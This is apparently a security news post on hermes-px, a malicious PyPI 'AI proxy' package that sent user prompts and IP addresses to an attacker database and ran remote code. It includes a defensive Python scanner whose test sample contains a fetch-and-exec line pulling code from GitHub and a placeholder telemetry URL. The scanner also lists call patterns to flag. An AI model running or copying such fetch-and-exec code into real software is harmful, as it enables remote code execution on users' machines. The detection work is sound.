👤 LOGICFALCON
🗓️ 08 Apr 2026  

AI Proxy or Trojan Horse? PyPI Package Unmasks Developers and Steals Sensitive Data

A slick Python package promising secure, anonymous AI access is revealed to be a data exfiltration tool exploiting stolen AI prompts and university infrastructure.

It looked like a gift for developers: a free, OpenAI-compatible Python package called hermes-px that routed AI requests through Tor, promising secure, anonymous inference. In reality, it was a carefully engineered trap - one that siphoned off user data, exposed real IP addresses, and leveraged stolen AI prompts, all while masquerading as a legitimate tool. The discovery, made by JFrog’s security research team, reveals the new sophistication of supply chain attacks targeting the AI developer community.

Fast Facts

  • Hermes-px, a PyPI package, posed as a secure AI proxy but covertly logged user data and real IP addresses.
  • The package hijacked a private university’s AI endpoint and used a stolen Anthropic Claude system prompt, poorly rebranded as “AXIOM-1.”
  • User prompts and AI responses were sent directly to an attacker-controlled database, bypassing Tor and breaking promised anonymity.
  • All telemetry and credentials were encrypted in multiple layers to evade detection by security scanners.
  • The package’s professional documentation and seamless integration mimicked trusted AI SDKs, luring unsuspecting developers.

Beneath the Surface: Deception Disguised as Innovation

Unlike most malicious packages that betray their intent with shoddy documentation or broken code, hermes-px was a masterclass in social engineering. It offered an API nearly identical to the official OpenAI Python SDK, complete with detailed guides, error handling, and even an advanced Retrieval-Augmented Generation pipeline. The package masqueraded as a product of the fictitious “EGen Labs,” further enhancing its credibility.

But beneath the polished veneer, the rot ran deep. The package instructed users to execute arbitrary Python code from a remote GitHub repository, granting attackers the ability to update or expand their payload at will. The core of the package contained a compressed file, base_prompt.pz, which, when unpacked, revealed a massive, nearly verbatim copy of Anthropic’s confidential Claude system prompt - clumsily rebranded but still littered with original identifiers.

While AI requests were routed through Tor - ostensibly to keep users anonymous - the most sensitive telemetry was funneled directly to an attacker-controlled Supabase database. This critical data, including user questions, AI responses, and the actual IP addresses of victims, was never anonymized. Triple-layer encryption concealed the communication from static security checks, making detection exceedingly difficult.
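The behaviours described above (remote code pulled from GitHub and executed, a compressed and layered prompt payload, telemetry sent to an undeclared host) are exactly the kind of traits a defender can look for before a package reaches production. The scanner below is an added illustration, not code from JFrog's analysis or from the package itself: it walks a Python source file's AST and flags exec()/eval() of network-fetched content, nested decode/decompress chains, and hard-coded URLs to hosts the package did not declare. The call lists, the host allowlist and the sample source it scans are constructed for this example.

```python
"""Static triage of a Python source file for supply-chain red flags (example code)."""
import ast
import re
from urllib.parse import urlparse

# Assumed list of calls that fetch bytes from the network; extend for your code base.
NETWORK_CALLS = {"requests.get", "requests.post", "urllib.request.urlopen", "httpx.get"}
# Decode / decompress / deserialise primitives that show up nested in obfuscated loaders.
DECODE_CALLS = {"base64.b64decode", "base64.b85decode", "zlib.decompress",
                "lzma.decompress", "bz2.decompress", "marshal.loads", "codecs.decode"}
EXEC_CALLS = {"exec", "eval"}
URL_RE = re.compile(r"^https?://")


def dotted_name(func):
    """Return 'pkg.mod.attr' for a call target, or None if it is not a plain name chain."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None


def mentions_network(node, tainted):
    """True if the expression fetches from the network or reads a variable that did."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call) and dotted_name(sub.func) in NETWORK_CALLS:
            return True
        if isinstance(sub, ast.Name) and sub.id in tainted:
            return True
    return False


def decode_chain(node):
    """Follow nested decode calls from the outside in; return the call nodes in the chain."""
    chain = []
    while isinstance(node, ast.Call) and dotted_name(node.func) in DECODE_CALLS and node.args:
        chain.append(node)
        node = node.args[0]
    return chain


class Triage(ast.NodeVisitor):
    def __init__(self, allowed_hosts):
        self.allowed_hosts = set(allowed_hosts)
        self.tainted = set()      # variable names assigned from network responses
        self.seen_chain = set()   # ids of inner decode calls already counted in a chain
        self.findings = []

    def visit_Assign(self, node):
        # Simple flow-insensitive taint: anything assigned from a fetch is "network data".
        if mentions_network(node.value, self.tainted):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    self.tainted.add(target.id)
        self.generic_visit(node)

    def visit_Call(self, node):
        name = dotted_name(node.func)
        if name in EXEC_CALLS and node.args and mentions_network(node.args[0], self.tainted):
            self.findings.append(f"L{node.lineno}: {name}() runs code fetched from the network")
        if id(node) not in self.seen_chain:
            chain = decode_chain(node)
            if len(chain) >= 2:
                self.seen_chain.update(id(c) for c in chain[1:])
                self.findings.append(f"L{node.lineno}: layered decode chain, depth {len(chain)}")
        self.generic_visit(node)

    def visit_Constant(self, node):
        if isinstance(node.value, str) and URL_RE.match(node.value):
            host = urlparse(node.value).hostname
            if host and host not in self.allowed_hosts:
                self.findings.append(f"L{node.lineno}: outbound URL to undeclared host {host}")


def triage(source, allowed_hosts=()):
    """Return a list of human-readable findings for one Python source string."""
    visitor = Triage(allowed_hosts)
    visitor.visit(ast.parse(source))
    return visitor.findings


# Constructed sample with the three traits; placeholder hosts, not the real package's code.
SAMPLE = '''
import base64, zlib, requests

TELEMETRY = "https://example-project.supabase.co/rest/v1/events"
API = "https://api.example.edu/v1/chat"

def load_prompt(path):
    with open(path, "rb") as f:
        return zlib.decompress(base64.b64decode(f.read())).decode()

def update():
    src = requests.get("https://raw.githubusercontent.com/example/repo/main/loader.py").text
    exec(src)
'''

if __name__ == "__main__":
    for finding in triage(SAMPLE, allowed_hosts={"api.example.edu"}):
        print(finding)
```

The host allowlist is the package's declared API endpoint; any other hard-coded destination is reported so a reviewer can ask why it exists. The taint tracking is deliberately simple (it does not follow data across functions), which is the usual trade-off for a fast pre-install check rather than a full analysis.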

By exploiting both the trust of the developer community and the infrastructure of an unwitting university, the attackers created an elaborate scheme that went undetected until expert analysis unraveled its true purpose. Anyone who installed hermes-px is advised to uninstall it immediately, rotate any credentials, and consider all transmitted data compromised.

Conclusion: The New Face of Open Source Threats

The hermes-px incident is a stark warning: as AI tools proliferate and open source ecosystems grow, attackers are raising their game. Even the most polished packages can hide malicious intent, exploiting trust and technical complexity in equal measure. Vigilance, skepticism, and rigorous code review are no longer optional - they are essential for survival in today’s software supply chain.

WIKICROOK

  • PyPI: PyPI is the main online repository for Python software packages, allowing developers to share, download, and manage Python code easily.
  • Tor Network: The Tor network is a privacy tool that routes internet traffic through several relays, making it hard to trace users’ identities or online actions.
  • System Prompt: A system prompt is a set of instructions given to an AI model to guide its behavior and responses and to ensure consistent, secure interactions.
  • Exfiltration: Exfiltration is the unauthorized transfer of sensitive data from a victim’s network to an external system controlled by attackers.
  • Supply Chain Attack: A supply chain attack is a cyberattack that compromises trusted software or hardware providers, spreading malware or vulnerabilities to many organizations at once.
Tags: AI Security, Data Exfiltration, Supply Chain Attack

LOGICFALCON, Log Intelligence Investigator